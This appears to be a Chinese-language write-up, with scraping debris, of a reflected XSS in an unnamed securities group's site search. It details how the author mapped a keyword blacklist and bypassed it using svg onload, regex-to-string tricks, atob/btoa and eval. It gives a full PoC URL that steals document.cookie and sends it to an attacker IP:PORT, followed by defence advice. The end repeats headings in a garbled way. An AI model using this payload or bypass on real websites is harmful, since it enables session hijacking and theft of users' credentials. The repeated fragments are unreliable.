反射型XSS绕过与利用技术详解<\/h1>

漏洞背景<\/h2>
本文档详细分析某证券集团网站反射型XSS漏洞的发现、绕过和利用过程，重点介绍在黑名单过滤机制下的突破方法。<\/p>

漏洞发现过程<\/h2>

1. 回显点确认<\/h3>

在网站搜索功能处进行测试：<\/p>

搜索任意字符串后检查元素，发现存在直接回显<\/li>
尝试闭合DIV标签：<\/div><script>alert(1)<\/script><div><\/code><\/li>

闭合成功，但系统仍返回两篇文章，表明存在无害性检测机制<\/li>
<\/ul>
2. 黑名单排查<\/h3>
通过逐一测试，确认以下关键词被过滤（大小写无关）：<\/p>

JS相关<\/strong>：script<\/code>, alert<\/code>, document<\/code>, confirm<\/code>, string<\/code>, fromcharcode<\/code>, onerror<\/code>, window<\/code>, cookie<\/code><\/li>
符号相关<\/strong>：单引号('<\/code>)、双引号("<\/code>)、加号(+<\/code>)、分号(;<\/code>)<\/li>
<\/ul>
测试案例：<\/p>

`` → 无响应（document和引号被过滤）<\/li>
`` → 无响应（string, fromCharCode, onerror被过滤）<\/li>
<\/ul>
绕过技术详解<\/h2>
1. 选择合法元素<\/h3>
由于<script><\/code>和``相关属性被限制，选择<svg><\/code>标签配合onload<\/code>事件：<\/p>

<svg\/onload=JS代码><\/code><\/li>
onload<\/code>属性后只能接一个函数才能正常解析<\/li>
<\/ul>
2. 执行函数选择<\/h3>
发现eval<\/code>未被过滤，可用于执行构造的JS代码：<\/p>

eval<\/code>可以执行字符串形式的JS代码<\/li>
但需要解决字符串构造问题（引号和String被过滤）<\/li>
<\/ul>
3. 字符串构造方法<\/h3>
创新性地使用正则表达式对象和字符串处理方法：<\/p>

正则表达式对象如\/XSS\/<\/code>本身不是字符串，但调用toString()<\/code>后变为"\/XSS\/"<\/code><\/li>
由于String<\/code>被过滤，使用slice<\/code>和concat<\/code>方法处理：

\/http:\/<\/code>.slice(1) → "http:\/"<\/code><\/li>
.concat(\/IP:PORT\/)<\/code> → 连接字符串<\/li>
<\/ul>
<\/li>
使用btoa<\/code>和atob<\/code>进行Base64编码解码绕过字符串检测<\/li>
<\/ol>
4. 关键突破点<\/h3>

slice<\/code>和concat<\/code>未被过滤<\/li>
正则表达式对象可作为字符串替代<\/li>
Base64编码函数可用<\/li>
eval<\/code>可用<\/li>
<\/ul>
完整PoC构造<\/h2>
?keyword=%3Csvg\/onload=location.href=atob(btoa(\/http:\/)).slice(1).concat(\/IP:PORT\/).concat(eval(atob(btoa(\/docum\/)).slice(1,-1).concat(atob(btoa(\/ent.cookie\/)).slice(1,-1))))%3E
<\/span><\/span><\/code><\/pre>解码后相当于：<\/p>
<svg<\/span>\/<\/span>onload<\/span>=<\/span>location.href=atob(btoa(\/http:\/)).slice(1).concat(\/IP:PORT\/).concat(eval(atob(btoa(\/docum\/)).slice(1,-1).concat(atob(btoa(\/ent.cookie\/)).slice(1,-1))))<\/span>>
<\/span><\/span><\/code><\/pre>工作原理：<\/p>

构造URL：http:\/\/IP:PORT<\/code><\/li>
构造document.cookie<\/code>字符串：

atob(btoa(\/docum\/)).slice(1,-1)<\/code> → "docum"<\/code><\/li>
atob(btoa(\/ent.cookie\/)).slice(1,-1)<\/code> → "ent.cookie"<\/code><\/li>
连接后得到"document.cookie"<\/code><\/li>
<\/ul>
<\/li>
通过eval<\/code>执行获取cookie并发送到攻击者服务器<\/li>
<\/ol>
防御建议<\/h2>

避免依赖黑名单<\/strong>：黑名单总有遗漏，无法全面防御<\/li>
输出编码<\/strong>：在回显处对用户输入进行HTML实体编码<\/li>
内容安全策略(CSP)<\/strong>：实施严格的CSP策略<\/li>
输入验证<\/strong>：对输入数据进行严格验证<\/li>
使用安全框架<\/strong>：利用现代框架的自动编码功能<\/li>
<\/ol>
技术总结<\/h2>
本案例展示了在黑名单过滤机制下如何通过：<\/p>

选择未被过滤的HTML元素和事件<\/li>
利用JS类型转换特性构造字符串<\/li>
组合使用未被过滤的字符串处理方法<\/li>
通过编码转换绕过关键词检测<\/li>
最终实现任意JS代码执行<\/li>
<\/ol>
这种绕过方式具有很高的技术价值，展示了XSS防御的复杂性和黑名单方法的局限性。<\/p>

反射型XSS绕过与利用技术详解<\/h1>

漏洞背景<\/h2> 本文档详细分析某证券集团网站反射型XSS漏洞的发现、绕过和利用过程，重点介绍在黑名单过滤机制下的突破方法。<\/p>

漏洞发现过程<\/h2>

绕过技术详解<\/h2>

漏洞背景<\/h2>
本文档详细分析某证券集团网站反射型XSS漏洞的发现、绕过和利用过程，重点介绍在黑名单过滤机制下的突破方法。<\/p>